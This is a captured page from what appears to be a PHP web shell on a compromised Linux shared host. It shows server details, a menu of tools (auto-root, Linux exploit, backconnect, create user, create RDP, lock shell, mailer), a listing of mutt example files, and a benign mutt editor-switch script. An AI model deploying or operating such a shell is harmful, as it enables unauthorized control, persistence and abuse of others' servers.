Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
mutt /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
Mush.rc
441
B
-rw-r--r--
Muttrc
178.06
KB
-rw-r--r--
Pine.rc
1022
B
-rw-r--r--
Tin.rc
606
B
-rw-r--r--
bgedit-detectgui.sh
1.29
KB
-rw-r--r--
bgedit-screen-tmux.sh
1.93
KB
-rw-r--r--
colors.angdraug
4.64
KB
-rw-r--r--
colors.default
611
B
-rw-r--r--
colors.linux
605
B
-rw-r--r--
gpg.rc
4.67
KB
-rw-r--r--
markdown2html
9.48
KB
-rw-r--r--
mutt_oauth2.py
17.29
KB
-rw-r--r--
mutt_oauth2.py.README
14.06
KB
-rw-r--r--
mutt_xtitle
311
B
-rw-r--r--
pgp2.rc
1.66
KB
-rw-r--r--
pgp5.rc
1.75
KB
-rw-r--r--
pgp6.rc
1.68
KB
-rw-r--r--
ray.muttrc
1.93
KB
-rw-r--r--
sample.mailcap
134
B
-rw-r--r--
sample.muttrc
12.66
KB
-rw-r--r--
sample.muttrc-compress
1.31
KB
-rw-r--r--
sample.muttrc-sidebar
3.9
KB
-rw-r--r--
sample.muttrc-starter
2.65
KB
-rw-r--r--
sample.muttrc-tlr
10.57
KB
-rw-r--r--
sample.vimrc-sidebar
2.62
KB
-rw-r--r--
smime.rc
4.19
KB
-rw-r--r--
smime_keys_test.pl
3.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bgedit-detectgui.sh
#!/bin/sh # # Copyright (C) 2020 Eike Rathke <erack@erack.de> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # To conveniently switch between graphics and terminal editor I have the # following in my muttrc: # source '~/.mutt/bgedit-detectgui.sh|' # # So exporting MUTT_USE_GVIM=yes (or anything) in the shell invoking mutt # switches to the background editing feature. # if [ -n "$MUTT_USE_GVIM" ] && [ -n "$DISPLAY" ]; then # Foreground gvim, window 80 cols by 40 rows at X 400 and Y 0. echo 'set editor="gvim -f -geometry 80x40+400+0"' echo 'set background_edit=yes' else echo 'set editor=vim' fi
Close